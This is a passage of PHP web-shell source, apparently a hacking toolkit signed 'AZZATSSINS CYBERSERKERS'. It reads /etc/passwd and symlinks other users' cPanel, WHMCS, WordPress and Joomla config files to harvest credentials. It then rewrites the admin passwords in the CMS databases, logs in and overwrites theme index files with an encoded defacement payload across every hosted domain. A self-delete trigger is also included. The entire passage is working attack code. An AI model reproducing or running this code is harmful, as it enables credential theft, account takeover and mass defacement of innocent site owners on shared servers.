- ".${${"GLOBALS"}["rrbcihfi"]});${"GLOBALS"}["kqonuyhyluq"]="II11II11II11II11";fwrite(${${"GLOBALS"}["ptqthiwbsgx"]},"CPANEL/WHM VERSION : ".${${"GLOBALS"}["tttkddsbp"]}."
- ");fwrite(${${"GLOBALS"}["cemjvape"]},"HOSTNAME : ".$host."
- ");fwrite(${${"GLOBALS"}["cemjvape"]},"WHM OWNER : ".${$osmnlv}."
- ");fwrite(${${"GLOBALS"}["cemjvape"]},"ACCESS HASH : ".${${"GLOBALS"}["jqstuo"]});fwrite(${${"GLOBALS"}["kqonuyhyluq"]},${${"GLOBALS"}["lqfwxtwbjz"]}."
- ");fwrite(${${"GLOBALS"}["cemjvape"]},"
- ");fclose(${${"GLOBALS"}["wvsimudpc"]});}
- ?>
- <?php
- if(isset($_GET['azzatssins'])){
- echo '<font face="Audiowide" size="5" color="red"><b> Good Bye !</b></font><br /><br />';
- $killme=basename($_SERVER['SCRIPT_NAME']);
- unlink($killme);
- }
- ?>
- <h3> Thanks To : Arrash Hemmat</h3>
- </pre></td></table>
- </td></tr></table></center>
- </body>
- </html>
- <?php }
- if($_GET['AZZATSSINS']=="CONFIGRABBER"){
- ?>
- <title>ConfiGrabber V2 by AZZATSSINS</title><body bgcolor=silver><center><div style=background:black;margin:0px;padding:4px;text-align:center;color:silver;><i><b><font color=lime>© </font><a href=mailto:cyberserkers@gmail.com>AZZATSSINS CYBERSERKERS</a></b></i></div><br><br><br><form method="post"><input style="margin:1px;padding:3px;max-width:90%;font-size:12px;background:#fff;width:60%;color:#333;border-radius:5px;border:3px solid #ddd;text-align:center" type="hidden" cols="100" rows="100" name="passwd" value="<?php $usr=file("/etc/passwd"); foreach($usr as $usrr) { $str=explode(":",$usrr); echo $str[0]."\n"; } ?>
- "><br>Your Folder : <input type="text" class="input" name="folfig" size="10" value="CONFIGRAB">
- <input style="background:dodgerblue;margin:1px;width:15%;padding:6px;color:#fff;border:0;font-weight:bold;" name="conf" class="ipt" value="EXECUTE" type="submit"><br><br></form></center>
- <?php @ini_set('html_errors',0); @ini_set('max_execution_time',0); @ini_set('display_errors', 0); @ini_set('file_uploads',1);
- if ($_POST['conf']) {
- $folfig = $_POST['folfig'];
- $functions=@ini_get("disable_functions"); if(eregi("symlink",$functions)){die ('<font color=red>Symlnk Has Been Disable...!!!</font>');}
- @mkdir($folfig, 0755);
- @chdir($folfig);
- $htaccess="Options Indexes FollowSymLinks\nDirectoryIndex azzatssins.cyberserkers\nAddType txt .php\nAddHandler txt .php";
- file_put_contents(".htaccess",$htaccess,FILE_APPEND);
- $passwd=explode("\n",$_POST["passwd"]);
- foreach($passwd as $pwd){ $user=trim($pwd);
- copy('/home/'.$user.'/.my.cnf',$user.' <~ CPANEL');
- symlink('/home/'.$user.'/.my.cnf',$user.' <~ CPANEL');
- copy('/home/'.$user.'/.accesshash',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/.accesshash',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/suspended.page/index.html',$user.' <~ RESELLER.txt');
- symlink('/home/'.$user.'/public_html/.accesshash',$user.' <~ RESELLER.txt');
- symlink('/home/'.$user.'/public_html/wp-config.php',$user.' <~ WORDPRESS.txt');
- symlink('/home/'.$user.'/public_html/configuration.php',$user.' <~ WHMCS or JOOMLA.txt');
- symlink('/home/'.$user.'/public_html/account/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/accounts/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/central/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/clienti/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/client/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/clientarea/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/clientsarea/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/client-area/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/clients-area/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/clientzone/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/client-zone/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/core/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/company/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/customer/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/customers/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/bill/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/finance/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/financeiro/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/host/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/hosts/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/hostings/configuration.php',$user.' <~ WHMCS.txt'-26);
- symlink('/home/'.$user.'/public_html/klien/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/manager/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/member/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/members/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/my/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/myaccount/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/my-account/client/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/myaccounts/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/my-accounts/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/order/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/orders/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/painel/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/panels/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/portals/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/secure/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/support/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/supporte/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/supports/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/web/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/webhost/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/webhosting/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/whmcs2/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/Whm/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/Whmcs/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/WHM/configuration.php',$user.' <~ WHMCS.txt');
- symlink('/home/'.$user.'/public_html/WHMCS/configuration.php',$user.' <~ WHMCS.txt');
- }
- echo '<center> PROCESS DONE, You Can Go To The Fucking Folder <a href='.$folfig.'>'.$folfig.'</a> And View You The GodDamn Grab Configs...!!! <br> <marquee><font color=red><a href=http://fb.me/AZZATSSINS.CYBERSERKERS>^_^ / Bye.....</a></font></marquee></center>';
- }
- }
- if($_GET['jo']=="wp"){
- error_reporting(0);
- function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
- $ar0=explode($marqueurDebutLien, $text);
- $ar1=explode($marqueurFinLien, $ar0[$i]);
- return trim($ar1[0]);
- }
- function randomt() {
- $chars = "abcdefghijkmnopqrstuvwxyz023456789";
- srand((double)microtime()*1000000);
- $i = 0;
- $pass = '';
- while ($i <= 7) {
- $num = rand() % 33;
- $tmp = substr($chars, $num, 1);
- $pass = $pass . $tmp;
- $i++;
- }
- return $pass;
- }
- function index_changer_wp($conf, $content) {
- $output = '';
- $dol = '$';
- $go = 0;
- $username = entre2v2($conf,"define('DB_USER', '","');");
- $password = entre2v2($conf,"define('DB_PASSWORD', '","');");
- $dbname = entre2v2($conf,"define('DB_NAME', '","');");
- $prefix = entre2v2($conf,$dol."table_prefix = '","'");
- $host = entre2v2($conf,"define('DB_HOST', '","');");
- $link=mysql_connect($host,$username,$password);
- if($link) {
- mysql_select_db($dbname,$link) ;
- $dol = '$';
- $req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '4297f44b13955235245b2497399d7a93' WHERE `ID` = 1");
- } else {
- $output.= "[-] DB Error<br />";
- }
- if($req1) {
- $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
- $data = mysql_fetch_array($req);
- $site_url=$data["option_value"];
- $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");
- $data = mysql_fetch_array($req);
- $template = $data["option_value"];
- $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");
- $data = mysql_fetch_array($req);
- $current_theme = $data["option_value"];
- $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
- $url2=$site_url."/wp-login.php";
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $url2);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=123123&rememberme=forever&wp-submit=Log In&testcookie=1");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
- curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
- $buffer = curl_exec($ch);
- $pos = strpos($buffer,"action=logout");
- if($pos === false) {
- $output.= "[-] Login Error<br />";
- } else {
- $output.= "[+] Login Successful<br />";
- $go = 1;
- }
- if($go) {
- $cond = 0;
- $url2=$site_url."/wp-admin/theme-editor.php?file=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';
- curl_setopt($ch, CURLOPT_URL, $url2);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
- curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
- $buffer0 = curl_exec($ch);
- $_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
- $_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
- if(substr_count($_file,"/index.php") != 0){
- $output.= "[+] index.php loaded in Theme Editor<br />";
- $url2=$site_url."/wp-admin/theme-editor.php";
- curl_setopt($ch, CURLOPT_URL, $url2);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
- curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
- $buffer = curl_exec($ch);
- curl_close($ch);
- $pos = strpos($buffer,'<div id="message" class="updated">');
- if($pos === false) {
- $output.= "[-] Updating Index.php Error<br />";
- } else {
- $output.= "[+] Index.php Updated Successfuly<br />";
- $hk = explode('public_html',$_file);
- $output.= '[+] Deface '.file_get_contents($site_url.str_replace('/blog','',$hk[1]));
- $cond = 1;
- }
- } else {
- $url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.$template;
- curl_setopt($ch, CURLOPT_URL, $url2);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
- curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
- $buffer0 = curl_exec($ch);
- $_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
- $_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
- if(substr_count($_file,"index.php") != 0){
- $output.= "[+] index.php loaded in Theme Editor<br />";
- $url2=$site_url."/wp-admin/theme-editor.php";
- curl_setopt($ch, CURLOPT_URL, $url2);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&theme=".$template."&_wpnonce=".$_wpnonce."&submit=Update File");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
- curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
- $buffer = curl_exec($ch);
- curl_close($ch);
- $pos = strpos($buffer,'<div id="message" class="updated">');
- if($pos === false) {
- $output.= "[-] Updating Index.php Error<br />";
- } else {
- $output.= "[+] Index.php Template Updated Successfuly<br />";
- $output.= '[+] Deface '.file_get_contents($site_url.'/wp-content/themes/'.$template.'/index.php');
- $cond = 1;
- }
- } else {
- $output.= "[-] index.php can not load in Theme Editor<br />";
- }
- }
- }
- } else {
- $output.= "[-] DB Error<br />";
- }
- global $base_path;
- unlink($base_path.'COOKIE.txt');
- return array('cond'=>$cond, 'output'=>$output);
- }
- function index_changer_joomla($conf, $content, $domain) {
- $doler = '$';
- $username = entre2v2($conf, $doler."user = '", "';");
- $password = entre2v2($conf, $doler."password = '", "';");
- $dbname = entre2v2($conf, $doler."db = '", "';");
- $prefix = entre2v2($conf, $doler."dbprefix = '", "';");
- $host = entre2v2($conf, $doler."host = '","';");
- $co=randomt();
- $site_url = "http://".$domain."/administrator";
- $output = '';
- $cond = 0;
- $link=mysql_connect($host, $username, $password);
- if($link) {
- mysql_select_db($dbname,$link) ;
- $req1 = mysql_query("UPDATE `".$prefix."users` SET `username` ='admin' , `password` = '4297f44b13955235245b2497399d7a93', `usertype` = 'Super Administrator', `block` = 0");
- $req = mysql_numrows(mysql_query("SHOW TABLES LIKE '".$prefix."extensions'"));
- } else {
- $output.= "[-] DB Error<br />";
- }
- if($req1){
- if ($req) {
- $req = mysql_query("SELECT * from `".$prefix."template_styles` WHERE `client_id` = '0' and `home` = '1'");
- $data = mysql_fetch_array($req);
- $template_name = $data["template"];
- $req = mysql_query("SELECT * from `".$prefix."extensions` WHERE `name`='".$template_name."' or `element` = '".$template_name."'");
- $data = mysql_fetch_array($req);
- $template_id = $data["extension_id"];
- $url2=$site_url."/index.php";
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $url2);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
- $buffer = curl_exec($ch);
- $return = entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
- $hidden = entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);
- if($return && $hidden) {
- curl_setopt($ch, CURLOPT_URL, $url2);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_REFERER, $url2);
- curl_setopt($ch, CURLOPT_POSTFIELDS, "username=admin&passwd=123123&option=com_login&task=login&return=".$return."&".$hidden."=1");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
- $buffer = curl_exec($ch);
- $pos = strpos($buffer,"com_config");
- if($pos === false) {
- $output.= "[-] Login Error<br />";
- } else {
- $output.= "[+] Login Successful<br />";
- }
- }
- if($pos){
- $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $url2);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
- $buffer = curl_exec($ch);
- $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
- if($hidden2) {
- $output.= "[+] index.php file found in Theme Editor<br />";
- } else {
- $output.= "[-] index.php Not found in Theme Editor<br />";
- }
- }
- if($hidden2) {
- $url2=$site_url."/index.php?option=com_templates&layout=edit";
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $url2);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$content."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
- $buffer = curl_exec($ch);
- curl_close($ch);
- $pos = strpos($buffer,'<dd class="message message">');
- $cond = 0;
- if($pos === false) {
- $output.= "[-] Updating Index.php Error<br />";
- } else {
- $output.= "[+] Index.php Template successfully saved<br />";
- $cond = 1;
- }
- }
- }
- else {
- $req =mysql_query("SELECT * from `".$prefix."templates_menu` WHERE client_id='0'");
- $data = mysql_fetch_array($req);
- $template_name=$data["template"];
- $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
- $url2=$site_url."/index.php";
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $url2);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
- $buffer = curl_exec($ch);
- $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);
- if($hidden) {
- curl_setopt($ch, CURLOPT_URL, $url2);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456&option=com_login&task=login&".$hidden."=1");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
- $buffer = curl_exec($ch);
- $pos = strpos($buffer,"com_config");
- if($pos === false) {
- $output.= "[-] Login Error<br />";
- } else {
- $output.= "[+] Login Successful<br />";
- }
- }
- if($pos) {
- $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
- curl_setopt($ch, CURLOPT_URL, $url2);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
- $buffer = curl_exec($ch);
- $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
- if($hidden2) {
- $output.= "[+] index.php file founded in Theme Editor<br />";
- } else {
- $output.= "[-] index.php Not found in Theme Editor<br />";
- }
- }
- if($hidden2) {
- $url2=$site_url."/index.php?option=com_templates&layout=edit";
- curl_setopt($ch, CURLOPT_URL, $url2);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$content."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
- $buffer = curl_exec($ch);
- curl_close($ch);
- $pos = strpos($buffer,'<dd class="message message fade">');
- $cond = 0;
- if($pos === false) {
- $output.= "[-] Updating Index.php Error<br />";
- } else {
- $output.= "[+] Index.php Template successfully saved<br />";
- $cond = 1;
- }
- }
- }
- } else {
- $output.= "[-] DB Error<br />";
- }
- global $base_path;
- unlink($base_path.$co);
- return array('cond'=>$cond, 'output'=>$output);
- }
- function exec_mode_1($def_url, $hacker) {
- @mkdir('sym',0777);
- $wr = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
- $fp = @fopen ('sym/.htaccess','w');
- fwrite($fp, $wr);
- @symlink('/','sym/root');
- $dominios = @file_get_contents("/etc/named.conf");
- @preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);
- $out[1] = array_unique($out[1]);
- $numero_dominios = count($out[1]);
- echo "Total domains: $numero_dominios <br><br />";
- $def = file_get_contents($def_url);
- $def = urlencode($def);
- $dd = 'PD9waHANCiRkZWYgPSBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3pvbmVobWlycm9ycy5uZXQvZGVmYWNlZC8yMDEzLzAxLzEzL2JhbHRzdHVkaW8ubHQvaW5kZXguaHRtbCcpOw0KJHAgPSBleHBsb2RlKCdwdWJsaWNfaHRtbCcsZGlybmFtZShfX0ZJTEVfXykpOw0KJHAgPSAkcFswXS4ncHVibGljX2h0bWwnOw0KaWYgKCRoYW5kbGUgPSBvcGVuZGlyKCRwKSkgew0KICAgICRmcDEgPSBAZm9wZW4oJHAuJy9pbmRleC5odG1sJywndysnKTsNCiAgICBAZndyaXRlKCRmcDEsICRkZWYpOw0KICAgICRmcDEgPSBAZm9wZW4oJHAuJy9pbmRleC5waHAnLCd3KycpOw0KICAgIEBmd3JpdGUoJGZwMSwgJGRlZik7DQogICAgJGZwMSA9IEBmb3BlbigkcC4nL2luZGV4Lmh0bScsJ3crJyk7DQogICAgQGZ3cml0ZSgkZnAxLCAkZGVmKTsNCiAgICBlY2hvICdEb25lJzsNCn0NCmNsb3NlZGlyKCRoYW5kbGUpOw0KdW5saW5rKF9fRklMRV9fKTsNCj8+';
- $base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';
- $output = fopen('defaced.html', 'a+');
- $_SESSION['count1'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count1']) ? $_SESSION['count1'] :0 ) : 0;
- $_SESSION['count2'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count2']) ? $_SESSION['count2'] :0 ) : 0;
- echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';
- $j = 1;
- $st = (isset($_GET['st']) && $_GET['st']!='') ? $_GET['st'] : 0;
- for($i = $st; $i <= $numero_dominios; $i++)
- {
- $domain = $out[1][$i];
- $dono_arquivo = @fileowner("/etc/valiases/".$domain);
- $infos = @posix_getpwuid($dono_arquivo);
- if($infos['name']!='root') {
- $config01 = @file_get_contents($base_url.$infos['name']."/public_html/configuration.php");
- $config02 = @file_get_contents($base_url.$infos['name']."/public_html/wp-config.php");
- $config03 = @file_get_contents($base_url.$infos['name']."/public_html/blog/wp-config.php");
- $cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
- if($config01 && preg_match('/dbprefix/i',$config01)){
- echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
- echo '<td align="center"><font color="pink">JOOMLA</font></td>';
- $res = index_changer_joomla($config01, $def, $domain);
- echo '<td>'.$res['output'].'</td>';
- if($res['cond']) {
- echo '<td align="center"><span class="green">DEFACED</span></td>';
- fwrite($output, 'http://'.$domain."<br>");
- $_SESSION['count1'] = $_SESSION['count1'] + 1;
- } else {
- echo '<td align="center"><span class="red">FAILED</span></td>';
- }
- echo '</tr>';
- }
- if($config02 && preg_match('/DB_NAME/i',$config02)){
- echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
- echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
- $res = index_changer_wp($config02, $dd);
- echo '<td>'.$res['output'].'</td>';
- if($res['cond']) {
- echo '<td align="center"><span class="green">DEFACED</span></td>';
- fwrite($output, 'http://'.$domain."<br>");
- $_SESSION['count2'] = $_SESSION['count2'] + 1;
- } else {
- echo '<td align="center"><span class="red">FAILED</span></td>';
- }
- echo '</tr>';
- }
- $cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
- if($config03 && preg_match('/DB_NAME/i',$config03)){
- echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
- echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
- $res = index_changer_wp($config03, $dd);
- echo '<td>'.$res['output'].'</td>';
- if($res['cond']) {
- echo '<td align="center"><span class="green">DEFACED</span></td>';
- fwrite($output, 'http://'.$domain."<br>");
- $_SESSION['count2'] = $_SESSION['count2'] + 1;
- } else {
- echo '<td align="center"><span class="red">FAILED</span></td>';
- }
- echo '</tr>';
- }
- }
- }
- echo '</table>';
- echo '<hr/>';
- echo 'Total Defaced = '.($_SESSION['count1']+$_SESSION['count2']).' (JOOMLA = '.$_SESSION['count1'].', WORDPRESS = '.$_SESSION['count2'].')<br />';
- echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';
- if($_SESSION['count1']+$_SESSION['count2'] > 0){
- echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
- }
- }
- function exec_mode_2($def_url) {
- $domains = @file_get_contents("/etc/named.conf");
- @preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);
- $out = array_unique($out[1]);
- $num = count($out);
- print("Total domains: $num<br><br />");
- $def = file_get_contents($def_url);
